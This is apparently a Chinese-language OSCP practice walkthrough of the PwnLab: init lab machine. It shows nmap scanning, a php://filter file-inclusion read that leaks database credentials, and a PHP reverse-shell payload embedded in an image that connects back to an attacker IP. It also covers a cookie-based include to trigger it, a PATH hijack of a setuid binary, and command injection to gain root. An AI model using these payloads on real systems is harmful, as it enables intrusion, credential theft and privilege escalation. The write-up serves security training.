OSCP备战-pwnlab_init靶机详细步骤

目标IP探测

使用ARP探测：

arp-scan -l

netdiscover -i eth0 -r 192.168.155.0/24

基于ICMP探测：

nmap -PE -sN 192.168.155.0/24 --min-rate 1000

使用TCP SYN：

nmap -PS -sN 192.168.155.0/24 --min-rate 1000

一般使用ARP，得到IP：192.168.155.177

端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 192.168.1ss55.173

结果：

80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: PwnLab Intranet Image Hosting
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          40574/udp   status
|   100024  1          43163/tcp   status
|   100024  1          60152/udp6  status
|_  100024  1          60690/tcp6  status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 40
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolOld, ConnectWithDatabase, LongColumnFlag, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, ODBCClient, Speaks41ProtocolNew, FoundRows, LongPassword, SupportsCompression, SupportsTransactions, IgnoreSigpipes, InteractiveClient, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: Zc`85B.]l&t;fo|An&n{
|_  Auth Plugin Name: mysql_native_password
43163/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:14:95:CC (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop

80端口获取shell

访问80端口，信息还是比较多的：

Use this server to upload and share image files inside the intranet

感觉上传文件有点东西，也有一个Login

网络站点当然得试一试dirsearch扫描

有个config.php,空白页面？

还是回到Login,之前端口扫描有3306数据库，当然得试一试sql啊
没啥用
弱密码
没啥用
又返回网站
看到url格式如下：

http://192.168.155.177/?page=login

能不能有伪协议读取文件

page=file:///etc/passwd

没有,拿出ctf常见协议：

php://filter/read=convert.base64-encode/resource=/etc/passwd

无结果，多试一试找到

php://filter/read=convert.base64-encode/resource=config
php://filter/read=convert.base64-encode/resource=upload
php://filter/read=convert.base64-encode/resource=login
php://filter/read=convert.base64-encode/resource=index

得到回显
index

PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?phpif (isset($_GET['page'])){include($_GET['page'].".php");}else{echo "Use this server to upload and share image files inside the intranet";}
?>
</center>
</body>
</html>

upload:
 

PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo/Pg==

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html><body><form action='' method='post' enctype='multipart/form-data'><input type='file' name='file' id='file' /><input type='submit' name='submit' value='Upload'/></form></body>
</html><?php 
if(isset($_POST['submit'])) {if ($_FILES['file']['error'] <= 0) {$filename  = $_FILES['file']['name'];$filetype  = $_FILES['file']['type'];$uploaddir = 'upload/';$file_ext  = strrchr($filename, '.');$imageinfo = getimagesize($_FILES['file']['tmp_name']);$whitelist = array(".jpg",".jpeg",".gif",".png"); if (!(in_array($file_ext, $whitelist))) {die('Not allowed extension, please upload images only.');}if(strpos($filetype,'image') === false) {die('Error 001');}if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {die('Error 002');}if(substr_count($filetype, '/')>1){die('Error 003');}$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {echo "<img src=\"".$uploadfile."\"><br />";} else {die('Error 4');}}
}?>   

login:
 

PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);if (isset($_POST['user']) and isset($_POST['pass']))
{$luser = $_POST['user'];$lpass = base64_encode($_POST['pass']);$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");$stmt->bind_param('ss', $luser, $lpass);$stmt->execute();$stmt->store_Result();if ($stmt->num_rows == 1){$_SESSION['user'] = $luser;header('Location: ?page=upload');}else{echo "Login failed.";}
}
else
{?><form action="" method="POST"><label>Username: </label><input id="user" type="test" name="user"><br /><label>Password: </label><input id="pass" type="password" name="pass"><br /><input type="submit" name="submit" value="Login"></form><?php
}

根据指引找到的config
config:

PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8

base解码得到信息

<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?   

得到一组登录：

root/H4u%QJ_H99  

试过了不是登录页面的账号，那么尝试登录目标的Mysql

mysql --ssl=0 -h 192.168.155.177  -uroot -pH4u%QJ_H99  

成功连接
数据库：

show databases;

表：

use Users;
show tables;

字段：

select * from users;

得到三个账户：

kent/JWzXuBJJNy
mike/SIfdsTEn6I
kane/iSv5Ym2GRo

登录成功，接下来看文件上传源代码：

判断传参submit-->判断文件是否上传成功-->白名单限制-->MIME类型校验-->文件头验证
尝试图片马攻击，生成图片马:

exiftool -Comment="<?php exec("bin/bash -c 'bash -i >& /dev/tcp/192.168.155.166/9001 0>&1'"); ?>   " 1.png   -o 11.png 

在upload.php中文件存储路径：

$uploaddir = 'upload/';

更新路径：

$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

其中
basename($_FILES['file']['name']): 提取原始文件名
md5(): 对原始文件名进行哈希处理
$file_ext: 保留原始扩展名
访问文件：

http://192.168.155.177/upload/59b2900aa03cb2182a51cdb520b535b6.png

关键是，如何触发脚本执行
1、扩展名伪造：
遗憾的是有白名单限制
2、结合包含（LFI）漏洞：
若存在其他页面包含上传文件的功能），通过包含图片马触发代码：
http://192.168.155.177/upload/59b2900aa03cb2182a51cdb520b535b6.png
3利用服务器解析特性：
测试Apache/IIS解析漏洞
选择？2
在index文件中有实现多语言支持，当存在cookie为lang时，会执行文件

bp抓包修改

成功连接，可以看到需要提权

横向移动

之前注意到Mysql的版本5.4.47
cve-2016-6664
但是这里没有条件执行

uname -a

查看内核版本

Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux

用处不大

cat /etc/passwd

john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash

执行 

su kent 

报错，通过执行py脚本生成交互式终端

python -c "import pty;pty.spawn('/bin/bash')"
su kent 
ls

没有有用信息，继续移动
mike验证失败，移动到kane

cd /home

挨着找找，发现一个msg2mike

file msg2mike

给出信息：

msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped

一个ELF文件
查看权限：

ls -l msgmike

给出信息

-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike

可读

strings -a msgmike

有一个
cat /home/mike/msg.txt

相对路径，构造PATH 环境变量劫持命令执行链
在当前目录创建名为 cat 的文件 

touch cat 

注入启动 shell 的指令 

echo "/bin/sh" >cat

赋予可执行权限

chmod 777 cat
ls

当程序调用外部命令时，默认从 PATH 环境变量中的目录按序查找可执行文件
将当前目录设为最高优先级搜索路径

export PATH=.
export
./msgmike
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
whoami
ls
cd mike
ls
strings -a msg2root

提权

语句拼接

./msg2root
;/bin/sh
id

成功

考点

1、文件包含，伪协议读取
2、代码审计，文件上传漏洞
3、内网横向移动
4、命令劫持漏洞
5、命令拼接绕过